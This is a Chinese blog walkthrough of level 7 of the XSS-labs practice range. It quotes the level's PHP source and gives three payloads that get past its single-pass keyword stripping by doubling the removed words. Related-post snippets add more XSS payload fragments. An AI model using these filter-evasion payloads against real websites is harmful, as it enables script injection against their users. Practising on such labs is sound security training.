XSS-labs-level7

最新推荐文章于 2024-06-16 22:45:48 发布
最新推荐文章于 2024-06-16 22:45:48 发布
阅读量71 收藏 1
点赞数 1
分类专栏: XSS-labs 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/130999743
版权

访问题目url

还是经典语句起手

<script>alert('xss')</script>

 我们查看一下回显

看来是过滤了一些字符,然后我们直接来看源代码

<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

 

  • strtolower() 将输入值转换为小写。
  • str_replace() 删除一些可能用于XSS攻击的关键词,包括"script",“on”,“src”,“data"和"href”。
  • htmlspecialchars() 将字符转义为HTML实体,以防止XSS攻击。

看来过滤了不少东西,那么我们构造一个payload

" oonnclick=javascript:alert('xss')>//
"><a hrehreff=javascripscriptt:alert('xss')>xss</a>//
"><img srsrcc=1 oonnerror=javascripscriptt:alert('xss')>//

 也就是把str_replace带有的删除,然后拼接成一个正常的语句

 

仲瑿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xss-labs/level7
m0_71299382的博客
11-29 200
xss-labs/level7
xss-labs/level10
m0_71299382的博客
11-29 198
xss-labs/level10
xss-labs/level9
m0_71299382的博客
11-29 297
xss-labs/level9
xss-labs/level6
m0_71299382的博客
11-29 287
xss-labs/level6
xss-labs/level17
m0_71299382的博客
11-30 234
xss-labs/level17
xss-labs通关详解 Level 6-10
qq_41755084的博客
10-25 940
这一关整体上与第五关类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
xss-labs/level-3
m0_71299382的博客
11-28 227
xss-labs/level3
xss-labs通关详解 Level 11-15
qq_41755084的博客
10-26 1192
这一关比上一关多了一个标签,其他没有变化,先试一下上一关的注入语句。发现在t_sort的标签中的"被编码成了html实体字符,没办法正常闭合了。而t_ref的值看起来像是请求的referer头。那我们将上一关的代码从referer头处传入。页面中出现了输入框,点击该输入框,弹窗成功。
xss-labs通关详解 Level 16-20
qq_41755084的博客
10-26 296
先输入标准的弹窗代码尝试一下。不出意外没有成功,再看一下网页源码。这里看到script与/字符被替换成了html实体字符中的空格。/字符被替换后,html标签就不能闭合了。这里我们可以使用这种不需要闭合的标签。传入后什么也没发生。看一下源码发现空格变成了html实体字符。那我们使用回车代替空格。(回车的url编码是%0A)弹窗成功。
xss-labs/level15
m0_71299382的博客
11-29 441
xss-labs/level15
xss-labs-master源码
07-06
20关xss靶场练习,帮助了解关于xss
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss-labs.zip
03-18
xss-labs是一个网站,其中包含了20个含有XSS漏洞的网页,用于学习XSS
xss+csrf项目实例
最新发布
qq_64302290的博客
06-16 280
如下:我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。源码地址下载链接:https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w提取码:4444。
Strict-Transport-Security(HSTS)& X-Frame-Options & X-XSS-Protection
weixin_42451330的博客
06-12 457
本文对Strict-Transport-Security(HSTS)& X-Frame-Options & X-XSS-Protection 进行了介绍,列举了常用指令及示例。
xss-lablevel11-level14
qq_64775230的博客
06-16 16
" onfocus=javascript:alert() type="text把这个填在referer里即可。但是t_ref参数接收的是HTTP_REFERER请求头,所以这道题应该是在这里存在漏洞点。所以真正的做法是:因为t_ref直接接收refer,所以直接构造referer。但是为啥这个网站打不开,反正感觉是跳转到这个网站然后再xss。查看了一下源代码,发现接收的是用户的cookie。而且大于号是被删掉了,但是可以使用伪协议。但是要注意的是大于号是被删除了。value里的是UA头。
XSS(跨站脚本攻击)
guowu666的博客
06-10 1410
xss基础
xss-lab靶场level1-level10
qq_64775230的博客
06-16 130
标签一起使用,以上面图片的html标签为例,标签是有输入框的,简单来说,onfocus事件就是当输入框被点击的时候,就会触发myFunction()函数,然后我们再配合javascript伪协议来执行javascript代码。">友情链接';echo '友情链接
xss-labs安装
07-28
127.0.0.1/xss-labs/level15.php?src='level1.php?name=<a href="javascript:alert(/xss/)">' 通过构造合适的payload,可以利用XSS-labs平台进行XSS攻击的实践和学习。请注意,在实际应用中,XSS攻击是违法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值